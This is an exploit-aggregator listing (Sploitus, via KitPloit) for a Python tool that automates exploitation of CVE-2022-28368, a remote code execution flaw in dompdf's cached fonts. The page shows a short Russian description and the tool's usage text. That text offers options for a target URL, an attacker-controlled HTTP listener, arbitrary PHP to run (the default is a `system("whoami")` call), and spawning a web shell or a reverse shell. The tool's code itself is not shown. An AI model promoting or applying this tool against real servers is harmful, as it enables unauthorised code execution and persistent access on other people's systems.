Sploitus

Exploit for CVE-2022-28368-handler

kitploit · 2026-09-04

Exploit Code

MARKDOWN27 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-THAT-GUY-STEVE-CVE-2022-28368-HANDLER
# CVE-2022-28368-handler

Этот репозиторий содержит Python-скрипт, который обрабатывает большую часть эксплойта для кешированных шрифтов dompdf (CVE-2022-28368) — всё, что вам нужно сделать, это создать запрос. Он также предоставит строку триггера для запуска эксплойта :)

## Использование

root@kitploit:~
    
    
    usage: CVE-2022-28368.py [-h] -d DOMPDF_LOCATION [-f FONTNAME] -i HTTP_IP [-p HTTP_PORT] [-P PHP] [-w] [-r]
    
    This script handles the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request
    
    optional arguments:
      -h, --help            show this help message and exit
      -d DOMPDF_LOCATION, --dompdf-location DOMPDF_LOCATION
                            dompdf location on target webserver (example: http://target.com/vendor/dompdf)
      -f FONTNAME, --fontname FONTNAME
                            Exploit font name (default: expfont.php)
      -i HTTP_IP, --http-ip HTTP_IP
                            HTTP listener IP
      -p HTTP_PORT, --http-port HTTP_PORT
                            HTTP listener PORT (default: 80)
      -P PHP, --php PHP     PHP to execute (default: <?php system("whoami"); ?>)
      -w, --webshell        Spawn web shell
      -r, --revshell        Spawn reverse shell (Uses HTTP listener IP and port 9001 by default)